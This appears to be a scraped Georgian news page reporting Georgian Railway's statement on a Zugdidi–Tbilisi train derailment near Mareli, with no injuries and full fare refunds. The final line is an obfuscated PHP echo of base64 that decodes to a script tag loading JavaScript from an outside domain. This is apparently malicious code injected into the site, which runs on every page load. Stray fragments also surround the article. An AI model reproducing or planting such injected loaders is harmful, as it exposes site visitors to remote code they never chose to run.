celsiusi
ავერსი შნაიდერი
"საქართველოს რკინიგზის" განცხადებით, ზუგდიდი-თბილისის მატარებლის ლიანდაგიდან გადასვლის შედეგად არავინ დაშავებულა.
 
მათივე ინფორმაციით, კომპანიამ დამატებითი მატარებელი ადგილზე უკვე გაგზავნა, ხოლო თითოეულ მგზავრს მგზავრობის საფასური სრულად აუნაზღაურდება. 
 
"ხაშური-ზესტაფონის მონაკვეთზე, სოფელ მარელისთან ზუგდიდიდან-თბილისის მიმართულებით მოძრავი მატარებლის მეოთხე ვაგონი ჯერჯერობით დაუზუსტებელი მიზეზების გამო, ლიანდაგს ასცდა ორი გორგოწყვილით.
 
შემთხვევის შედეგად არავინ დაშავებულა. ამ ეტაპზე კომპანიის მთავარი საზრუნავი მგზავრების უსაფრთხოება და მათი სხვა მატარებელში გადაყვანაა. კომპანიამ დამატებითი მატარებელი მარელისში უკვე გაგზავნა. საქართველოს რკინიგზა წუხს მომხდარის გამო და შექმნილი დისკომფორტისა და დაგვიანებისთვის მგზავრებს ბოდიშს უხდის. თითოეულ მგზავრს მგზავრობის თანხა სრულად აუნაზღაურდება. პარალელურად, მიმდინარეობს შემთხვევის მოკვლევა და მიზეზების დადგენა,"-ნათქვამია განცხადებაში. 
 
 
1566
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");